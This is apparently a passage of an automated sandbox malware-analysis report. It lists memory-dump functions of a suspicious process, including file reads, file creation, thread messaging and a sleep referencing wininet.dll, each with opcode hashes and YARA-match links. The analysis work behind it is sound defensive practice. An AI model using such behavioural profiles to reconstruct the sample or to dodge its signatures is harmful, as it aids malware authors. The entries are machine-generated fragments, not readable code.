                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00124BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00124BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0012A3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: d56f46eb1be5e4239b1e6c94dcce05e592ab85c52cadf44414a321a4209374a5
                                                • Instruction ID: c69e2a78efcb8d8df0d032b5203653261d21c16f534b8f91aff64f9fc2e8288f
                                                • Opcode Fuzzy Hash: d56f46eb1be5e4239b1e6c94dcce05e592ab85c52cadf44414a321a4209374a5
                                                • Instruction Fuzzy Hash: E611E2B2210009AFCB08DFA8DC84CEB77ADFF8C754B258649FA1D93201D634E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00124BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00124BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0012A3AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 4c2bde7896b3b1e82645d29dfe9f3c6dfed909482ed5db29a8f1acbe2dcc83cb
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: 61F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A40A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(00124D72,5EB65239,FFFFFFFF,00124A31,?,?,00124D72,?,00124A31,FFFFFFFF,5EB65239,00124D72,?,00000000), ref: 0012A455
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1adc704855daf59fd18c7978f78fde3c6a462d23d04938e041fefc5bd728430c
                                                • Instruction ID: 659882988b38adc24605493d09c624b967da050be95a1080e685743d4410aed8
                                                • Opcode Fuzzy Hash: 1adc704855daf59fd18c7978f78fde3c6a462d23d04938e041fefc5bd728430c
                                                • Instruction Fuzzy Hash: 0BF07FB6200118AFCB14DF99DC81EEB77A9AF8C754F158248BA1DA7241DA34E911CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A410, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(00124D72,5EB65239,FFFFFFFF,00124A31,?,?,00124D72,?,00124A31,FFFFFFFF,5EB65239,00124D72,?,00000000), ref: 0012A455
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: 0eadc11b6853a637530a86095667742cd932d7106f8b282a7e711f140cfac3cd
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: 5EF0B7B2200208AFCB14DF99DC81EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(00124D50,?,?,00124D50,00000000,FFFFFFFF), ref: 0012A4B5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 87556880b08f049c8d08fad1a1f5ea2fac0fe91440d2f59c96df67fc567a0433
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: A7D012752002146BD710EB98DC45E97775CEF44B50F154455BA185B242C530F51086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A48A, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(00124D50,?,?,00124D50,00000000,FFFFFFFF), ref: 0012A4B5
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: c44058b855ac9d5382c1e7bb39213284127d91912d72c7fd6612ddceb40b3234
                                                • Instruction ID: afe4d3d136cbdac215298d1728e6002a206bc9f3ca0cc3e6a6c6d76840235fca
                                                • Opcode Fuzzy Hash: c44058b855ac9d5382c1e7bb39213284127d91912d72c7fd6612ddceb40b3234
                                                • Instruction Fuzzy Hash: 43D02BA950D2C08FDB10FBB4F4D40CABB60EF9061872459DEE4B407647D27592159391
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025100C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025107AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0250FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00129080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00129128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 63b074d02b32f5d52c03573cb7efcbb94df90b0032c280438d237d9954d47463
                                                • Instruction ID: 13cf65b9f7a3fa184a014270a606409bbaab3d539a131364f2edc624d7d2eac6
                                                • Opcode Fuzzy Hash: 63b074d02b32f5d52c03573cb7efcbb94df90b0032c280438d237d9954d47463
                                                • Instruction Fuzzy Hash: 673192B2900355BBC714DF69D885FA7B7B8FB48B00F10811DF62A6B245D734B560CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00129077, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 00129128
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: a84567f6ebfe09480a29e2c342acf471a990fa459547b2101abd7cc5a8e78633
                                                • Instruction ID: cdf1936c9b9d91564397a52d4a09b87e1dc1aab4223f7e224d9f8bb66fc0f6a3
                                                • Opcode Fuzzy Hash: a84567f6ebfe09480a29e2c342acf471a990fa459547b2101abd7cc5a8e78633
                                                • Instruction Fuzzy Hash: BB21D2B1900351ABC714DF69D8C5FA7B7B8FF48704F10801DF6296B245D774A960CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00113AF8), ref: 0012A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 70e88bfada0b541d495cabb85d188d3e0cbb4560133f661edad51ba2218f8d93
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 8FE04FB12002186FD714DF59DC45EA777ACEF88750F118554FD1857241C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00118310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0011836A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0011838B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: eb98dd3dfbfccd50391a5d0e174e4a5484c44bf3fdb2df05183759b85b31f33b
                                                • Instruction ID: 37296ed6b0ab46df64763be12a1043c403b9dbb5613eeda490941cdcc3ab1a47
